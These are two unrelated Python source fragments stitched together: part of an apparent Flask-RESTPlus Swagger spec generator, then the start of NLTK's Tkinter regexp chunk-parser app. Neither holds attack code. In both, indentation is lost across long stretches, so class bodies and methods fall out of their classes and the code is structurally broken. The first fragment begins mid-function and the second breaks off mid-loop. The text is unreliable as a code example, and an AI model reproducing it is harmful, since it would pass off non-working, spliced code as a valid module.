            descriptor, name = None, token
        param = {
            'name': name,
            'in': 'path',
            'required': True
        }
        if descriptor in PATH_TYPES:
            param['type'] = PATH_TYPES[descriptor]
        elif descriptor in current_app.url_map.converters:
            # Custom converter: fall back to a plain string parameter.
            param['type'] = 'string'
        else:
            raise ValueError('Unsupported type converter')
        params[name] = param
    return params
def _param_to_header(param):
    '''Convert a Swagger parameter spec into a response-header spec.

    Strips the location fields and normalizes the type: Python primitives
    map through PY_TYPES, objects exposing ``__schema__`` are merged in,
    anything else is passed through. Mutates and returns *param*.
    '''
    for location_key in ('in', 'name'):
        param.pop(location_key, None)
    typedef = param.get('type', 'string')
    if isinstance(typedef, Hashable) and typedef in PY_TYPES:
        param['type'] = PY_TYPES[typedef]
    elif hasattr(typedef, '__schema__'):
        param.update(typedef.__schema__)
    else:
        param['type'] = typedef
    return param
def parse_docstring(obj):
    '''Split an object's docstring into structured metadata.

    Returns a dict with the raw docstring, a first-sentence summary, the
    remaining details, and a mapping of documented ``:raises:`` clauses
    (which are removed from the details text).
    '''
    raw = getdoc(obj)
    summary = None
    details = None
    if raw:
        summary = raw.strip(' \n').split('\n')[0].split('.')[0]
        details = raw.replace(summary, '').lstrip('. \n').strip(' \n')
    raises = {}
    for match in RE_RAISES.finditer(raw or ''):
        raises[match.group('name')] = match.group('description')
        if details:
            details = details.replace(match.group(0), '')
    return {
        'raw': raw,
        'summary': summary or None,
        'details': details or None,
        'returns': None,
        'params': [],
        'raises': raises,
    }
class Swagger(object):
'''
A Swagger documentation wrapper for an API instance.
'''
def __init__(self, api):
self.api = api
self._registered_models = {}
def as_dict(self):
'''
Output the specification as a serializable ``dict``.
:returns: the full Swagger specification in a serializable format
:rtype: dict
'''
basepath = self.api.base_path
if len(basepath) > 1 and basepath.endswith('/'):
basepath = basepath[:-1]
infos = {
'title': _v(self.api.title),
'version': _v(self.api.version),
}
if self.api.description:
infos['description'] = _v(self.api.description)
if self.api.terms_url:
infos['termsOfService'] = _v(self.api.terms_url)
if self.api.contact and (self.api.contact_email or self.api.contact_url):
infos['contact'] = {
'name': _v(self.api.contact),
'email': _v(self.api.contact_email),
'url': _v(self.api.contact_url),
}
if self.api.license:
infos['license'] = {'name': _v(self.api.license)}
if self.api.license_url:
infos['license']['url'] = _v(self.api.license_url)
paths = {}
tags = self.extract_tags(self.api)
# register errors
responses = self.register_errors()
for ns in self.api.namespaces:
for resource, urls, kwargs in ns.resources:
for url in urls:
paths[extract_path(url)] = self.serialize_resource(ns, resource, url, kwargs)
specs = {
'swagger': '2.0',
'basePath': basepath,
'paths': not_none_sorted(paths),
'info': infos,
'produces': list(iterkeys(self.api.representations)),
'consumes': ['application/json'],
'securityDefinitions': self.api.authorizations or None,
'security': self.security_requirements(self.api.security) or None,
'tags': tags,
'definitions': self.serialize_definitions() or None,
'responses': responses or None,
'host': self.get_host(),
}
return not_none(specs)
def get_host(self):
hostname = current_app.config.get('SERVER_NAME', None) or None
if hostname and self.api.blueprint and self.api.blueprint.subdomain:
hostname = '.'.join((self.api.blueprint.subdomain, hostname))
return hostname
def extract_tags(self, api):
tags = []
by_name = {}
for tag in api.tags:
if isinstance(tag, string_types):
tag = {'name': tag}
elif isinstance(tag, (list, tuple)):
tag = {'name': tag[0], 'description': tag[1]}
elif isinstance(tag, dict) and 'name' in tag:
pass
else:
raise ValueError('Unsupported tag format for {0}'.format(tag))
tags.append(tag)
by_name[tag['name']] = tag
for ns in api.namespaces:
if ns.name not in by_name:
tags.append({
'name': ns.name,
'description': ns.description
})
elif ns.description:
by_name[ns.name]['description'] = ns.description
return tags
def extract_resource_doc(self, resource, url):
doc = getattr(resource, '__apidoc__', {})
if doc is False:
return False
doc['name'] = resource.__name__
params = merge(self.expected_params(doc), doc.get('params', {}))
params = merge(params, extract_path_params(url))
doc['params'] = params
for method in [m.lower() for m in resource.methods or []]:
method_doc = doc.get(method, OrderedDict())
method_impl = getattr(resource, method)
if hasattr(method_impl, 'im_func'):
method_impl = method_impl.im_func
elif hasattr(method_impl, '__func__'):
method_impl = method_impl.__func__
method_doc = merge(method_doc, getattr(method_impl, '__apidoc__', OrderedDict()))
if method_doc is not False:
method_doc['docstring'] = parse_docstring(method_impl)
method_params = self.expected_params(method_doc)
method_params = merge(method_params, method_doc.get('params', {}))
inherited_params = dict((k, v) for k, v in iteritems(params) if k in method_params)
method_doc['params'] = merge(inherited_params, method_params)
doc[method] = method_doc
return doc
def expected_params(self, doc):
    """Translate the ``expect`` entries of a doc dict into Swagger parameters."""
    params = {}
    if 'expect' not in doc:
        return params
    for expect in doc.get('expect', []):
        if isinstance(expect, RequestParser):
            # A RequestParser expands into one parameter per argument.
            params.update((p['name'], p) for p in expect.__schema__)
        elif isinstance(expect, ModelBase):
            # A model becomes a single required body parameter.
            params['payload'] = not_none({
                'name': 'payload',
                'required': True,
                'in': 'body',
                'schema': self.serialize_schema(expect),
            })
        elif isinstance(expect, (list, tuple)):
            if len(expect) == 2:
                # this is (payload, description) shortcut
                model, description = expect
                params['payload'] = not_none({
                    'name': 'payload',
                    'required': True,
                    'in': 'body',
                    'schema': self.serialize_schema(model),
                    'description': description
                })
            else:
                # Any other list/tuple is serialized as-is (array schema).
                params['payload'] = not_none({
                    'name': 'payload',
                    'required': True,
                    'in': 'body',
                    'schema': self.serialize_schema(expect),
                })
    return params
def register_errors(self):
    """Build reusable response definitions from the API's registered error handlers."""
    responses = {}
    for exception, handler in self.api.error_handlers.items():
        handler_doc = parse_docstring(handler)
        response = {'description': handler_doc['summary']}
        apidoc = getattr(handler, '__apidoc__', {})
        if 'params' in apidoc:
            # Params documented as headers become response headers.
            response['headers'] = dict(
                (name, _param_to_header(param))
                for name, param in apidoc['params'].items()
                if param.get('in') == 'header'
            )
        if 'responses' in apidoc:
            # The first documented response supplies the schema.
            _, model = list(apidoc['responses'].values())[0]
            response['schema'] = self.serialize_schema(model)
        responses[exception.__name__] = not_none(response)
    return responses
def serialize_resource(self, ns, resource, url, kwargs):
    """Serialize a single resource into a Swagger path item object (or None)."""
    doc = self.extract_resource_doc(resource, url)
    if doc is False:
        return
    path = {'parameters': self.parameters_for(doc) or None}
    # Restrict to the HTTP methods actually routed for this registration.
    routed = [m.lower() for m in kwargs.get('methods', [])]
    for method in [m.lower() for m in resource.methods or []]:
        if doc[method] is False or (routed and method not in routed):
            continue
        operation = self.serialize_operation(doc, method)
        operation['tags'] = [ns.name]
        path[method] = operation
    return not_none(path)
def serialize_operation(self, doc, method):
    """Serialize one HTTP method of a resource into a Swagger operation object."""
    operation = {
        'responses': self.responses_for(doc, method) or None,
        'summary': doc[method]['docstring']['summary'],
        'description': self.description_for(doc, method) or None,
        'operationId': self.operation_id_for(doc, method),
        'parameters': self.parameters_for(doc[method]) or None,
        'security': self.security_for(doc, method),
    }
    # Handle deprecated annotation
    if doc.get('deprecated') or doc[method].get('deprecated'):
        operation['deprecated'] = True
    # Handle form exceptions: pick the right "consumes" for form/file uploads.
    # Use .get() because body parameters carry a 'schema' instead of a 'type',
    # so a plain item lookup could raise KeyError here.
    parameters = operation['parameters']
    if parameters and any(p.get('in') == 'formData' for p in parameters):
        if any(p.get('type') == 'file' for p in parameters):
            operation['consumes'] = ['multipart/form-data']
        else:
            operation['consumes'] = ['application/x-www-form-urlencoded', 'multipart/form-data']
    return not_none(operation)
def description_for(self, doc, method):
    """Extract the description metadata and fall back on the whole docstring."""
    chunks = []
    if 'description' in doc:
        chunks.append(doc['description'])
    method_doc = doc[method] if method in doc else None
    if method_doc is not None and 'description' in method_doc:
        chunks.append(method_doc['description'])
    # Docstring details always come last (doc[method] is assumed present here,
    # matching the callers in serialize_operation).
    details = doc[method]['docstring']['details']
    if details:
        chunks.append(details)
    return '\n'.join(chunks).strip()
def operation_id_for(self, doc, method):
    """Extract the operation id, falling back to the API's default id scheme."""
    method_doc = doc[method]
    if 'id' in method_doc:
        return method_doc['id']
    return self.api.default_id(doc['name'], method)
def parameters_for(self, doc):
    """Build the Swagger parameter list from a doc dict's ``params``.

    NOTE(review): the param dicts are mutated in place (name/in/type are
    filled in), so the changes are visible through ``doc`` as well.
    """
    params = []
    for name, param in iteritems(doc['params']):
        param['name'] = name
        # Default to a plain string query parameter when nothing is specified.
        if 'type' not in param and 'schema' not in param:
            param['type'] = 'string'
        if 'in' not in param:
            param['in'] = 'query'

        if 'type' in param and 'schema' not in param:
            ptype = param.get('type', None)
            if isinstance(ptype, (list, tuple)):
                # A list/tuple type means "array of <first element>".
                typ = ptype[0]
                param['type'] = 'array'
                param['items'] = {'type': PY_TYPES.get(typ, typ)}
            elif isinstance(ptype, (type, type(None))) and ptype in PY_TYPES:
                # Translate Python types (int, str, ...) to Swagger type names.
                param['type'] = PY_TYPES[ptype]
        params.append(param)

    # Handle fields mask
    mask = doc.get('__mask__')
    if (mask and current_app.config['RESTPLUS_MASK_SWAGGER']):
        # Advertise the optional fields-mask header parameter.
        param = {
            'name': current_app.config['RESTPLUS_MASK_HEADER'],
            'in': 'header',
            'type': 'string',
            'format': 'mask',
            'description': 'An optional fields mask',
        }
        if isinstance(mask, string_types):
            param['default'] = mask
        params.append(param)

    return params
def responses_for(self, doc, method):
    """Build the Swagger ``responses`` object for one operation.

    Merges resource-level then method-level declarations (method-level
    wins), attaches the marshalling model when present, links documented
    ``:raises:`` names to registered error handlers, and falls back to a
    default 200 response when nothing is documented.
    """
    # TODO: simplify/refactor responses/model handling
    responses = {}

    for d in doc, doc[method]:
        if 'responses' in d:
            for code, response in iteritems(d['responses']):
                # A bare string is a description; otherwise (description, model).
                description, model = (response, None) if isinstance(response, string_types) else response
                description = description or DEFAULT_RESPONSE_DESCRIPTION
                if code in responses:
                    responses[code].update(description=description)
                else:
                    responses[code] = {'description': description}
                if model:
                    responses[code]['schema'] = self.serialize_schema(model)
        if 'model' in d:
            # Marshalling model: attach it to the declared (or default 200) code.
            code = str(d.get('default_code', 200))
            if code not in responses:
                responses[code] = DEFAULT_RESPONSE.copy()
            responses[code]['schema'] = self.serialize_schema(d['model'])

        if 'docstring' in d:
            # Map documented raised-exception names onto registered error
            # handlers, referencing the global responses section.
            for name, description in d['docstring']['raises'].items():
                for exception, handler in self.api.error_handlers.items():
                    error_responses = getattr(handler, '__apidoc__', {}).get('responses', {})
                    code = list(error_responses.keys())[0] if error_responses else None
                    if code and exception.__name__ == name:
                        responses[code] = {'$ref': '#/responses/{0}'.format(name)}
                        break

    if not responses:
        responses['200'] = DEFAULT_RESPONSE.copy()
    return responses
def serialize_definitions(self):
    """Serialize every registered model into the Swagger ``definitions`` mapping."""
    definitions = {}
    for name, model in iteritems(self._registered_models):
        definitions[name] = model.__schema__
    return definitions
def serialize_schema(self, model):
    """Serialize *model* into a Swagger schema object (JSON ref or inline).

    Accepts a model instance or model name, a list/tuple (meaning an array
    of the single contained model), a ``fields.Raw`` subclass or instance,
    or a plain Python type known to ``PY_TYPES``.  Branch order matters:
    list/tuple must be tested before the scalar cases.
    """
    if isinstance(model, (list, tuple)):
        # A one-element list/tuple means "array of <model>".
        model = model[0]
        return {
            'type': 'array',
            'items': self.serialize_schema(model),
        }
    elif isinstance(model, ModelBase):
        self.register_model(model)
        return ref(model)
    elif isinstance(model, string_types):
        # A model referenced by name; it must already be known to the API.
        self.register_model(model)
        return ref(model)
    elif isclass(model) and issubclass(model, fields.Raw):
        # A field class: instantiate it and serialize the instance.
        return self.serialize_schema(model())
    elif isinstance(model, fields.Raw):
        return model.__schema__
    elif isinstance(model, (type, type(None))) and model in PY_TYPES:
        # Plain Python types (int, str, None, ...) map to Swagger scalars.
        return {'type': PY_TYPES[model]}
    raise ValueError('Model {0} not registered'.format(model))
def register_model(self, model):
    """Record *model* (and, recursively, its parents and field models) for
    emission in the ``definitions`` section; returns a JSON reference.

    Raises ValueError when the model was never declared on the API.
    """
    name = model.name if isinstance(model, ModelBase) else model
    if name not in self.api.models:
        raise ValueError('Model {0} not registered'.format(name))
    specs = self.api.models[name]
    self._registered_models[name] = specs
    if isinstance(specs, ModelBase):
        # Parent models must be emitted too.
        for parent in specs.__parents__:
            self.register_model(parent)
    if isinstance(specs, Model):
        # Register any models referenced by the model's own fields.
        for field in itervalues(specs):
            self.register_field(field)
    return ref(model)
def register_field(self, field):
    """Register every model referenced (possibly indirectly) by *field*."""
    if isinstance(field, fields.Polymorph):
        # Any of the mapped models may appear in the output.
        for mapped in itervalues(field.mapping):
            self.register_model(mapped)
    elif isinstance(field, fields.Nested):
        self.register_model(field.nested)
    elif isinstance(field, fields.List):
        # Recurse into the element field of the list.
        self.register_field(field.container)
def security_for(self, doc, method):
    """Resolve security requirements; method-level overrides resource-level."""
    security = None
    # Later sources win: resource-level first, then the method's own doc.
    for source in (doc, doc[method]):
        if 'security' in source:
            security = self.security_requirements(source['security'])
    return security
def security_requirements(self, value):
    """Normalize a security declaration into a list of requirement objects."""
    if isinstance(value, (list, tuple)):
        return [self.security_requirement(item) for item in value]
    if value:
        requirement = self.security_requirement(value)
        return [requirement] if requirement else None
    # Falsy (None, '', {}) means "no security": an explicit empty list.
    return []
def security_requirement(self, value):
    """Normalize one security entry into the ``{name: scopes}`` Swagger form."""
    if isinstance(value, (string_types)):
        # A bare scheme name carries no scopes.
        return {value: []}
    if isinstance(value, dict):
        # Ensure every scope value is a list.
        normalized = {}
        for name, scopes in iteritems(value):
            normalized[name] = scopes if isinstance(scopes, (list, tuple)) else [scopes]
        return normalized
    return None
| |
# Natural Language Toolkit: Regexp Chunk Parser Application
#
# Copyright (C) 2001-2011 NLTK Project
# Author: Edward Loper <edloper@gradient.cis.upenn.edu>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
#
# $Id: srparser.py 5609 2007-12-31 03:02:41Z stevenbird $
"""
A graphical tool for exploring the regular expression based chunk
parser (L{RegexpChunkParser<nltk.chunk.regex.RegexpChunkParser>}).
@todo: Add a way to select the development set from the menubar. This
might just need to be a selection box (conll vs treebank etc) plus
configuration parameters to select what's being chunked (eg VP vs NP)
and what part of the data is being used as the development set.
"""
import time
import textwrap
import re
import random
import nltk
from nltk.tree import Tree
from nltk.util import in_idle
from nltk.draw.util import *
class RegexpChunkApp(object):
"""
A graphical tool for exploring the regular expression based chunk
parser (L{RegexpChunkParser<nltk.chunk.regex.RegexpChunkParser>}).
See L{HELP} for instructional text.
"""
##/////////////////////////////////////////////////////////////////
## Help Text
##/////////////////////////////////////////////////////////////////
#: A dictionary mapping from part of speech tags to descriptions,
#: which is used in the help text.  (This should probably live with
#: the conll and/or treebank corpus instead.)
TAGSET = {
    'CC': 'Coordinating conjunction', 'PRP$': 'Possessive pronoun',
    'CD': 'Cardinal number', 'RB': 'Adverb',
    'DT': 'Determiner', 'RBR': 'Adverb, comparative',
    'EX': 'Existential there', 'RBS': 'Adverb, superlative',
    'FW': 'Foreign word', 'RP': 'Particle',
    'JJ': 'Adjective', 'TO': 'to',
    'JJR': 'Adjective, comparative', 'UH': 'Interjection',
    'JJS': 'Adjective, superlative', 'VB': 'Verb, base form',
    'LS': 'List item marker', 'VBD': 'Verb, past tense',
    'MD': 'Modal', 'NNS': 'Noun, plural',
    # BUGFIX: description read 'masps'; Penn Treebank NN = noun, singular or mass.
    'NN': 'Noun, singular or mass', 'VBN': 'Verb, past participle',
    'VBZ': 'Verb,3rd ps. sing. present', 'NNP': 'Proper noun, singular',
    'NNPS': 'Proper noun plural', 'WDT': 'wh-determiner',
    'PDT': 'Predeterminer', 'WP': 'wh-pronoun',
    'POS': 'Possessive ending', 'WP$': 'Possessive wh-pronoun',
    'PRP': 'Personal pronoun', 'WRB': 'wh-adverb',
    '(': 'open parenthesis', ')': 'close parenthesis',
    '``': 'open quote', ',': 'comma',
    "''": 'close quote', '.': 'period',
    '#': 'pound sign (currency marker)',
    '$': 'dollar sign (currency marker)',
    'IN': 'Preposition/subord. conjunction',
    'SYM': 'Symbol (mathematical or scientific)',
    'VBG': 'Verb, gerund/present participle',
    'VBP': 'Verb, non-3rd ps. sing. present',
    ':': 'colon',
    }
#: Contents for the help box. This is a list of tuples, one for
#: each help page, where each tuple has four elements:
#: - A title (displayed as a tab)
#: - A string description of tabstops (see Tkinter.Text for details)
#: - The text contents for the help page. You can use expressions
#: like <red>...</red> to colorize the text; see L{HELP_AUTOTAG}
#: for a list of tags you can use for colorizing.
HELP = [
('Help', '20',
"Welcome to the regular expression chunk-parser grammar editor. "
"You can use this editor to develop and test chunk parser grammars "
"based on NLTK's RegexpChunkParser class.\n\n"
# Help box.
"Use this box ('Help') to learn more about the editor; click on the "
"tabs for help on specific topics:"
"<indent>\n"
"Rules: grammar rule types\n"
"Regexps: regular expression syntax\n"
"Tags: part of speech tags\n</indent>\n"
# Grammar.
"Use the upper-left box ('Grammar') to edit your grammar. "
"Each line of your grammar specifies a single 'rule', "
"which performs an action such as creating a chunk or merging "
"two chunks.\n\n"
# Dev set.
"The lower-left box ('Development Set') runs your grammar on the "
"development set, and displays the results. "
"Your grammar's chunks are <highlight>highlighted</highlight>, and "
"the correct (gold standard) chunks are "
"<underline>underlined</underline>. If they "
"match, they are displayed in <green>green</green>; otherwise, "
"they are displayed in <red>red</red>. The box displays a single "
"sentence from the development set at a time; use the scrollbar or "
"the next/previous buttons view additional sentences.\n\n"
# Performance
"The lower-right box ('Evaluation') tracks the performance of "
"your grammar on the development set. The 'precision' axis "
"indicates how many of your grammar's chunks are correct; and "
"the 'recall' axis indicates how many of the gold standard "
"chunks your system generated. Typically, you should try to "
"design a grammar that scores high on both metrics. The "
"exact precision and recall of the current grammar, as well "
"as their harmonic mean (the 'f-score'), are displayed in "
"the status bar at the bottom of the window."
),
('Rules', '10',
"<h1>{...regexp...}</h1>"
"<indent>\nChunk rule: creates new chunks from words matching "
"regexp.</indent>\n\n"
"<h1>}...regexp...{</h1>"
"<indent>\nChink rule: removes words matching regexp from existing "
"chunks.</indent>\n\n"
"<h1>...regexp1...}{...regexp2...</h1>"
"<indent>\nSplit rule: splits chunks that match regexp1 followed by "
"regexp2 in two.</indent>\n\n"
"<h1>...regexp...{}...regexp...</h1>"
"<indent>\nMerge rule: joins consecutive chunks that match regexp1 "
"and regexp2</indent>\n"
),
('Regexps', '10 60',
#"Regular Expression Syntax Summary:\n\n"
"<h1>Pattern\t\tMatches...</h1>\n"
"<hangindent>"
"\t<<var>T</var>>\ta word with tag <var>T</var> "
"(where <var>T</var> may be a regexp).\n"
"\t<var>x</var>?\tan optional <var>x</var>\n"
"\t<var>x</var>+\ta sequence of 1 or more <var>x</var>'s\n"
"\t<var>x</var>*\ta sequence of 0 or more <var>x</var>'s\n"
"\t<var>x</var>|<var>y</var>\t<var>x</var> or <var>y</var>\n"
"\t.\tmatches any character\n"
"\t(<var>x</var>)\tTreats <var>x</var> as a group\n"
"\t# <var>x...</var>\tTreats <var>x...</var> "
"(to the end of the line) as a comment\n"
"\t\\<var>C</var>\tmatches character <var>C</var> "
"(useful when <var>C</var> is a special character "
"like + or #)\n"
"</hangindent>"
"\n<h1>Examples:</h1>\n"
"<hangindent>"
'\t<regexp><NN></regexp>\n'
'\t\tMatches <match>"cow/NN"</match>\n'
'\t\tMatches <match>"green/NN"</match>\n'
'\t<regexp><VB.*></regexp>\n'
'\t\tMatches <match>"eating/VBG"</match>\n'
'\t\tMatches <match>"ate/VBD"</match>\n'
'\t<regexp><IN><DT><NN></regexp>\n'
'\t\tMatches <match>"on/IN the/DT car/NN"</match>\n'
'\t<regexp><RB>?<VBD></regexp>\n'
'\t\tMatches <match>"ran/VBD"</match>\n'
'\t\tMatches <match>"slowly/RB ate/VBD"</match>\n'
'\t<regexp><\#><CD> # This is a comment...</regexp>\n'
'\t\tMatches <match>"#/# 100/CD"</match>\n'
"</hangindent>"
),
('Tags', '10 60',
"<h1>Part of Speech Tags:</h1>\n" +
'<hangindent>' +
'<<TAGSET>>' + # this gets auto-substituted w/ self.TAGSET
'</hangindent>\n')
]
HELP_AUTOTAG = [
('red', dict(foreground='#a00')),
('green', dict(foreground='#080')),
('highlight', dict(background='#ddd')),
('underline', dict(underline=True)),
('h1', dict(underline=True)),
('indent', dict(lmargin1=20, lmargin2=20)),
('hangindent', dict(lmargin1=0, lmargin2=60)),
('var', dict(foreground='#88f')),
('regexp', dict(foreground='#ba7')),
('match', dict(foreground='#6a6')),
]
##/////////////////////////////////////////////////////////////////
## Config Parmeters
##/////////////////////////////////////////////////////////////////
_EVAL_DELAY = 1
"""If the user has not pressed any key for this amount of time (in
seconds), and the current grammar has not been evaluated, then
the eval demon will evaluate it."""
_EVAL_CHUNK = 15
"""The number of sentences that should be evaluated by the eval
demon each time it runs."""
_EVAL_FREQ = 0.2
"""The frequency (in seconds) at which the eval demon is run"""
_EVAL_DEMON_MIN = .02
"""The minimum amount of time that the eval demon should take each time
it runs -- if it takes less than this time, _EVAL_CHUNK will be
modified upwards."""
_EVAL_DEMON_MAX = .04
"""The maximum amount of time that the eval demon should take each time
it runs -- if it takes more than this time, _EVAL_CHUNK will be
modified downwards."""
_GRAMMARBOX_PARAMS = dict(
width=40, height=12, background='#efe', highlightbackground='#efe',
highlightthickness=1, relief='groove', border=2, wrap='word')
_HELPBOX_PARAMS = dict(
width=15, height=15, background='#efe', highlightbackground='#efe',
foreground='#555',
highlightthickness=1, relief='groove', border=2, wrap='word')
_DEVSETBOX_PARAMS = dict(
width=70, height=10, background='#eef', highlightbackground='#eef',
highlightthickness=1, relief='groove', border=2, wrap='word',
tabs=(30,))
_STATUS_PARAMS = dict(
background='#9bb', relief='groove', border=2)
_FONT_PARAMS = dict(
family='helvetica', size=-20)
_FRAME_PARAMS = dict(
background='#777', padx=2, pady=2, border=3)
_EVALBOX_PARAMS = dict(
background='#eef', highlightbackground='#eef',
highlightthickness=1, relief='groove', border=2,
width=300, height=280)
_BUTTON_PARAMS = dict(
background='#777', activebackground='#777',
highlightbackground='#777')
_HELPTAB_BG_COLOR = '#aba'
_HELPTAB_FG_COLOR = '#efe'
_HELPTAB_FG_PARAMS = dict(background='#efe')
_HELPTAB_BG_PARAMS = dict(background='#aba')
_HELPTAB_SPACER = 6
def normalize_grammar(self, grammar):
    """Return *grammar* with comments stripped, whitespace collapsed,
    and bare ``$`` characters backslash-escaped.

    All patterns are raw strings: the original passed ``'\\n\\s+'`` as a
    plain literal, whose ``\\s`` is an invalid string escape (a
    SyntaxWarning on modern Pythons); the raw form is regex-equivalent.
    """
    # Strip comments (a '#' not preceded by a backslash starts a comment)
    grammar = re.sub(r'((\\.|[^#])*)(#.*)?', r'\1', grammar)
    # Normalize whitespace
    grammar = re.sub(r' +', ' ', grammar)
    grammar = re.sub(r'\n\s+', '\n', grammar)
    grammar = grammar.strip()
    # [xx] Hack: automatically backslash $!
    grammar = re.sub(r'([^\\])\$', r'\1\\$', grammar)
    return grammar
def __init__(self, devset_name='conll2000', devset=None,
             grammar='', chunk_node='NP', tagset=None):
    """
    @param devset_name: The name of the development set; used for
        display & for save files.  If either the name 'treebank'
        or the name 'conll2000' is used, and devset is None, then
        devset will be set automatically.
    @param devset: A list of chunked sentences
    @param grammar: The initial grammar to display.
    @param tagset: Dictionary from tags to string descriptions, used
        for the help page.  Defaults to C{self.TAGSET}.
    """
    self._chunk_node = chunk_node
    if tagset is None: tagset = self.TAGSET
    self.tagset = tagset

    # Named development sets:
    if devset is None:
        if devset_name == 'conll2000':
            devset = nltk.corpus.conll2000.chunked_sents('train.txt')#[:100]
        elif devset_name == 'treebank':
            # BUGFIX: this previously tested ``devset == 'treebank'``, but
            # devset is always None on this branch, so the treebank
            # development set was unreachable and raised ValueError instead.
            devset = nltk.corpus.treebank_chunk.chunked_sents()#[:100]
        else:
            raise ValueError('Unknown development set %s' % devset_name)

    self.chunker = None
    """The chunker built from the grammar string"""

    self.grammar = grammar
    """The unparsed grammar string"""

    self.normalized_grammar = None
    """A normalized version of L{self.grammar}."""

    self.grammar_changed = 0
    """The last time() that the grammar was changed."""

    self.devset = devset
    """The development set -- a list of chunked sentences."""

    self.devset_name = devset_name
    """The name of the development set (for save files)."""

    self.devset_index = -1
    """The index into the development set of the first instance
       that's currently being viewed."""

    self._last_keypress = 0
    """The time() when a key was most recently pressed"""

    self._history = []
    """A list of (grammar, precision, recall, fscore) tuples for
       grammars that the user has already tried."""

    self._history_index = 0
    """When the user is scrolling through previous grammars, this
       is used to keep track of which grammar they're looking at."""

    self._eval_grammar = None
    """The grammar that is being currently evaluated by the eval
       demon."""

    self._eval_normalized_grammar = None
    """A normalized copy of L{_eval_grammar}."""

    self._eval_index = 0
    """The index of the next sentence in the development set that
       should be looked at by the eval demon."""

    self._eval_score = nltk.chunk.ChunkScore(chunk_node=chunk_node)
    """The L{ChunkScore <nltk.chunk.ChunkScore>} object that's used
       to keep track of the score of the current grammar on the
       development set."""

    # Set up the main window.
    top = self.top = Tk()
    top.geometry('+50+50')
    top.title('Regexp Chunk Parser App')
    top.bind('<Control-q>', self.destroy)

    # Variable that restricts how much of the devset we look at.
    self._devset_size = IntVar(top)
    self._devset_size.set(100)

    # Set up all the tkinter widgets
    self._init_fonts(top)
    self._init_widgets(top)
    self._init_bindings(top)
    self._init_menubar(top)
    self.grammarbox.focus()

    # If a grammar was given, then display it.
    if grammar:
        self.grammarbox.insert('end', grammar+'\n')
        self.grammarbox.mark_set('insert', '1.0')

    # Display the first item in the development set
    self.show_devset(0)
    self.update()
def _init_bindings(self, top):
    """Install the application's keyboard shortcuts."""
    # Window-wide shortcuts.
    shortcuts = (
        ('<Control-n>', self._devset_next),
        ('<Control-p>', self._devset_prev),
        ('<Control-t>', self.toggle_show_trace),
        ('<KeyPress>', self.update),
        ('<Control-s>', lambda e: self.save_grammar()),
        ('<Control-o>', lambda e: self.load_grammar()),
    )
    for sequence, callback in shortcuts:
        top.bind(sequence, callback)
    # The navigation shortcuts must also work while the grammar box
    # holds keyboard focus.
    self.grammarbox.bind('<Control-t>', self.toggle_show_trace)
    self.grammarbox.bind('<Control-n>', self._devset_next)
    self.grammarbox.bind('<Control-p>', self._devset_prev)
    # Redraw the eval graph when the window size changes
    self.evalbox.bind('<Configure>', self._eval_plot)
def _init_fonts(self, top):
    """Create the main and small fonts; sizes track ``self._size``."""
    # What's our font size (default=same as sysfont)
    self._size = IntVar(top)
    self._size.set(20)
    self._font = tkFont.Font(family='helvetica',
                             size=-self._size.get())
    # The small font is 14/20 of the main size.  int() keeps the size
    # integral under Python 3's true division (it was implicit floor
    # division under Python 2); tkFont expects an integer size.
    self._smallfont = tkFont.Font(family='helvetica',
                                  size=-int(self._size.get()*14/20))
def _init_menubar(self, parent):
    """Build the File / View / Development-Set / Help menu bar."""
    menubar = Menu(parent)

    filemenu = Menu(menubar, tearoff=0)
    filemenu.add_command(label='Reset Application', underline=0,
                         command=self.reset)
    filemenu.add_command(label='Save Current Grammar', underline=0,
                         accelerator='Ctrl-s', command=self.save_grammar)
    filemenu.add_command(label='Load Grammar', underline=0,
                         accelerator='Ctrl-o', command=self.load_grammar)
    filemenu.add_command(label='Save Grammar History', underline=13,
                         command=self.save_history)
    filemenu.add_command(label='Exit', underline=1,
                         command=self.destroy, accelerator='Ctrl-q')
    menubar.add_cascade(label='File', underline=0, menu=filemenu)

    # Font-size choices (negative Tk sizes are pixel sizes).
    viewmenu = Menu(menubar, tearoff=0)
    for label, size in (('Tiny', 10), ('Small', 16), ('Medium', 20),
                        ('Large', 24), ('Huge', 34)):
        viewmenu.add_radiobutton(label=label, variable=self._size,
                                 underline=0, value=size,
                                 command=self.resize)
    menubar.add_cascade(label='View', underline=0, menu=viewmenu)

    # How much of the development set the eval demon scores.
    devsetmenu = Menu(menubar, tearoff=0)
    for size in (50, 100, 200, 500):
        devsetmenu.add_radiobutton(label='%d sentences' % size,
                                   variable=self._devset_size,
                                   value=size,
                                   command=self.set_devset_size)
    menubar.add_cascade(label='Development-Set', underline=0,
                        menu=devsetmenu)

    helpmenu = Menu(menubar, tearoff=0)
    helpmenu.add_command(label='About', underline=0,
                         command=self.about)
    menubar.add_cascade(label='Help', underline=0, menu=helpmenu)

    parent.config(menu=menubar)
def toggle_show_trace(self, *e):
    """Flip between the rule-trace view and the development-set view."""
    action = self.show_devset if self._showing_trace else self.show_trace
    action()
    # Tell Tkinter not to process this keystroke any further.
    return 'break'
# Configuration for the evaluation scatter plot:
_SCALE_N = 5 # center on the last 5 examples.
_DRAW_LINES = False # default for connecting successive history points with lines
def _eval_plot(self, *e, **config):
    """Redraw the precision/recall scatter plot in the evaluation box.

    Accepts optional ``width``/``height`` overrides via **config;
    otherwise the current canvas size is used.
    """
    width = config.get('width', self.evalbox.winfo_width())
    height = config.get('height', self.evalbox.winfo_height())

    # Clear the canvas
    self.evalbox.delete('all')

    # Draw the precision & recall labels.
    tag = self.evalbox.create_text(10, height/2-10, justify='left',
                                   anchor='w', text='Precision')
    left, right = self.evalbox.bbox(tag)[2] + 5, width-10
    tag = self.evalbox.create_text(left + (width-left)/2, height-10,
                                   anchor='s', text='Recall', justify='center')
    top, bot = 10, self.evalbox.bbox(tag)[1]-10

    # Draw masks for clipping the plot.
    bg = self._EVALBOX_PARAMS['background']
    self.evalbox.lower(self.evalbox.create_rectangle(0, 0, left-1, 5000,
                                                     fill=bg, outline=bg))
    self.evalbox.lower(self.evalbox.create_rectangle(0, bot+1, 5000, 5000,
                                                     fill=bg, outline=bg))

    # Calculate the plot's scale.  When autoscaling, zoom in on the most
    # recent _SCALE_N history entries (with a .01 margin on each side).
    if self._autoscale.get() and len(self._history) > 1:
        max_precision = max_recall = 0
        min_precision = min_recall = 1
        for i in range(1, min(len(self._history), self._SCALE_N+1)):
            grammar, precision, recall, fmeasure = self._history[-i]
            min_precision = min(precision, min_precision)
            min_recall = min(recall, min_recall)
